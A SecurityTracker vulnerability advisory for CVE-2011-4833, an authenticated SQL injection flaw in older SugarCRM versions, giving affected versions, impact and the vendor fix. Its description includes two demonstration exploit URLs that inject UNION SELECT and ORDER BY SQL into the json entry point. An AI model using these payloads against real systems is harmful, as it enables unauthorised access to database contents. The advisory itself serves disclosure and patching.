SugarCRM Input Validation Flaw Lets Remote Authenticated Users Inject SQL Commands - SecurityTracker

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Forum/Board/Portal) > SugarSales (SugarCRM)

Vendors: SugarCRM Inc.

SugarCRM Input Validation Flaw Lets Remote Authenticated Users Inject SQL Commands

SecurityTracker Alert ID: 1026369

SecurityTracker URL: http://securitytracker.com/id/1026369

CVE Reference: CVE-2011-4833 (Links to External Site)

Updated: Dec 15 2011

Original Entry Date: Dec 3 2011

Impact: Disclosure of system information, Disclosure of user information, User access via network

Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes

Version(s): prior to versions 6.1.7, 6.2.4, 6.3.0RC3, 6.4.0beta1

Description: A vulnerability was reported in SugarCRM. A remote authenticated user can inject SQL commands.

The software does not properly validate user-supplied input. A remote authenticated user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/index.php?entryPoint=json&action=get_full_list&module=Leads&where=0
%29%20union%20select%20version
%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,
28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,
57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71%20--%20

http://[target]/index.php?entryPoint=json&action=get_full_list&module=Leads&order=SQL_CODE _HERE%20--%20

The original advisory is available at:

https://www.htbridge.ch/advisory/sql_injection_in_sugarcrm.html

High-Tech Bridge SA Security Research Lab reported this vulnerability.

Impact: A remote authenticated user can execute SQL commands on the underlying database.

Solution: The vendor has issued a fix (6.1.7, 6.2.4, 6.3.0RC3, 6.4.0beta1).

Vendor URL: www.sugarcrm.com/crm/support/bugs.html#issue_47800 (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History: None.

Source Message Contents

Date: Sat, 03 Dec 2011 04:27:24 +0000
Subject: SugarCRM


https://www.htbridge.ch/advisory/sql_injection_in_sugarcrm.html

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2013, SecurityGlobal.net LLC